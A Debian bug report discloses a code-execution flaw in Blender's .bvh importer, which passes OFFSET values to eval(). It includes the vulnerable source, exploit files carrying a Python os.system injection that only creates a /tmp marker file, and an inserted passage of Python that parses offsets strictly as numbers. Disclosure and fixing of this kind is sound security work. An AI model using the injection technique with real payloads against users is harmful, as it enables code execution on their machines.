Subject: blender: Arbitrary code execution when importing a .bvh file
Package: blender
Version: 2.36-1
Severity: grave
Justification: user security hole

The bvh_import.py script supplied with the current Debian Stable and (I
think) unstable versions of Blender is vulnerable to arbitrary code
execution.

The problem was corrected on 2005/01/22 in CVS, but the main package
doesn't ship the fixed script.

Attached are the e-mail sent to the Blender people, one working exploit
to test the vulnerability under Debian, and two proofs of concept.

Regards,
Joxean Koret

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages blender depends on:
ii  gettext [libg 0.14.4-2                   GNU Internationalization utilities
ii  libc6         2.3.2.ds1-22               GNU C Library: Shared libraries an
ii  libfreetype6  2.1.7-2.4                  FreeType 2 font engine, shared lib
ii  libgcc1       1:3.4.3-13                 GCC support library
ii  libjpeg62     6b-10                      The Independent JPEG Group's JPEG
ii  libopenal0    0.2004090900-1.1           OpenAL is a portable library for 3
ii  libpng12-0    1.2.8rel-1                 PNG library - runtime
ii  libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii  libstdc++5    1:3.3.5-13                 The GNU Standard C++ Library v3
ii  libx11-6      4.3.0.dfsg.1-14            X Window System protocol client li
ii  python2.3     2.3.5-4                    An interactive high-level object-o
ii  xlibmesa-gl [ 4.3.0.dfsg.1-14            Mesa 3D graphics library [XFree86]
ii  xlibmesa-glu  4.3.0.dfsg.1-14            Mesa OpenGL utility library [XFree
ii  xlibs         4.3.0.dfsg.1-14            X Keyboard Extension (XKB) configu
ii  zlib1g        1:1.2.2-4.sarge.2          compression library - runtime

-- no debconf information

HIERARCHY
ROOT Joxean
{
  OFFSET __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit')  
0.000000  0.000000 
}
MOTION
Frames: 250
Frame Time: 0.333300 
Hi!

        I have found a security vulnerability in Blender that allows arbitrary
code to be executed when trying to import a .bvh file. The problem is the
following:

        The vulnerable module is a Python plugin. This plugin parses the .bvh
files and creates the corresponding objects for Blender. The problem is in the
files bvh_import.py and bvh_export.py, but it is "presumably" only exploitable
when importing .bvh files, not when exporting.

        Taking a look at the bvh_import.py file, I have found various Python
"eval" calls around lines 334 and 370. The Python "eval" call is EVIL and
should not be used normally. Anyway, the source code of the plugin looks as
follows:

-------------------------------------------------------------------------------------
321   channelList = []
322   channelIndex = -1
323   
324   lineIdx = 1 # An index for the file.
325   while lineIdx < len(lines) -1:
326     #...
327     if lines[lineIdx][0] == 'ROOT' or lines[lineIdx][0] == 'JOINT':
328       # MAY NEED TO SUPPORT MULTIPLE ROOT's HERE!!!, Still unsure weather multiple roots are possible.??
329
330       print len(parent) * '  ' + 'node:',lines[lineIdx][1],' parent:',parent[-1]
331       
332       name = lines[lineIdx][1]
333       lineIdx += 2 # Incriment to the next line (Offset)
334       offset = ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval(lines[lineIdx][3]) )
335       lineIdx += 1 # Incriment to the next line (Channels)
-------------------------------------------------------------------------------------

        As we can see, the second (lines[lineIdx][1]), third (lines[lineIdx][2])
and fourth words of the parsed line will be evaled to get the X, Y and Z values
of the object. But what if this is not a number? What if it's malicious Python
code? One sample:

-------------------------------------------------------------------------------------
01 HIERARCHY
02 ROOT name 1 2
03 
04 1 2 3 4
05 1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4
06 
07 
08 
09 
10
-------------------------------------------------------------------------------------

        The second word of the 5th line is a correct fragment of Python code.
When the plugin tries to parse the .bvh file, the code __import__('os')... will
be evaled and the file /tmp/bvh_import_exploit will be created. But, I don't
know why, this proof of concept doesn't work on my machine, so I created a valid
exploit that Blender imports without any errors and/or warnings and that creates
the file /tmp/bvh_import_exploit. Attached is a valid exploit called exploit.bvh
that creates the file /tmp/bvh_import_exploit.

NOTE: This vulnerability is exploitable on any of the Blender supported
platforms.

Regards,
Joxean Koret
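The fix the report asks for is to stop evaluating OFFSET tokens and parse them as numbers instead. The following is an added illustration, not Blender's code or the reporter's: a strict replacement for the eval() calls on line 334 that only accepts numeric literals, applied to a constructed .bvh hierarchy and to an OFFSET line shaped like the one in the report (the joint-stack walk and the `_NUMBER` pattern are this example's own assumptions).

```python
import re

# Constructed sample input (not from the report): a minimal valid hierarchy.
SAMPLE_BVH = """HIERARCHY
ROOT Hips
{
  OFFSET 0.0 0.0 0.0
  JOINT Chest
  {
    OFFSET 0.0 5.21 0.0
    End Site
    {
      OFFSET 0.0 4.0 0.0
    }
  }
}
MOTION
"""
# Same shape as the malicious line from the report; it is only ever a string here.
MALICIOUS_OFFSET = "OFFSET __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 0.0 0.0"

# Strict numeric literal: optional sign, digits, optional fraction and exponent.
# float() alone would also accept 'nan', 'inf' and underscores, so guard first.
_NUMBER = re.compile(r'^[-+]?(\d+\.?\d*|\.\d+)([eE][-+]?\d+)?$')

def parse_offset(tokens):
    """Replacement for the eval() calls on line 334: accept exactly three
    numeric literals and convert them with float(); anything else is rejected."""
    if len(tokens) != 4 or tokens[0] != 'OFFSET':
        raise ValueError('malformed OFFSET line: %r' % (tokens,))
    for tok in tokens[1:]:
        if not _NUMBER.match(tok):
            raise ValueError('non-numeric OFFSET value rejected: %r' % tok)
    return tuple(float(tok) for tok in tokens[1:])

def parse_hierarchy_offsets(text):
    """Walk the HIERARCHY section and return [(joint, (x, y, z)), ...]."""
    offsets, stack = [], []
    for raw in text.splitlines():
        tokens = raw.split()
        if not tokens:
            continue
        if tokens[0] == 'MOTION':
            break
        if tokens[0] in ('ROOT', 'JOINT'):
            stack.append(tokens[1])
        elif tokens[0] == 'End':
            stack.append(stack[-1] + '_end')
        elif tokens[0] == 'OFFSET':
            offsets.append((stack[-1], parse_offset(tokens)))
        elif tokens[0] == '}':
            stack.pop()
    return offsets
```

A file carrying code in an OFFSET field now fails with a ValueError before any of it is evaluated, while ordinary numeric offsets (including exponent forms) still parse.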
HIERARCHY
End Site

1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4
HIERARCHY
ROOT name 1 2

1 2 3 4
1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4
